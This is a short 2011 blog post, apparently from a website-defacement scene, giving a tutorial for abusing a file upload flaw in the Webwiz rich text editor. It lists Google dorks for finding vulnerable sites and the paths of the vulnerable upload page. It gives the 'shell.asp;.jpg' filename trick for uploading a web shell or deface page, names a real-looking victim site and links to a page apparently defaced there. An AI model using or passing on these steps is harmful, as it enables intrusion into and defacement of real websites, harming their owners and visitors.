Tuesday, July 26, 2011

Hey guyzz this a very short tutorial ,  actually its a RTE exploit -file upload vulnerbility of Webwiz websites .


Webwiz rich text editor HTML code is carried in the open after they are sent charCode due functioning of the page .



>Google Dorks: 
these dorks will help you to find vulnerable websites

inurl:rte/my_documents/my_files

inurl:/my_documents/my_files/ 

Exploit: 

site.com/rte/RTE_popup_file_atch.asp 

site.com/admin/RTE_popup_file_atch.asp

FOR example
Site:
- 
http://www.nftmo.com/RTE_popup_file_atch.asp
you can also upload a shell or directly your deface page shell format:- shell.asp;.jpg 

Hacked site:

http://www.nftmo.com//my_docum?ents/my_files/Cyb3r_dev.htm

note: use this at your own risk coz many websites are now olready infected by backdoors.

thnxx for reading it..:)

0 comments:

Post a Comment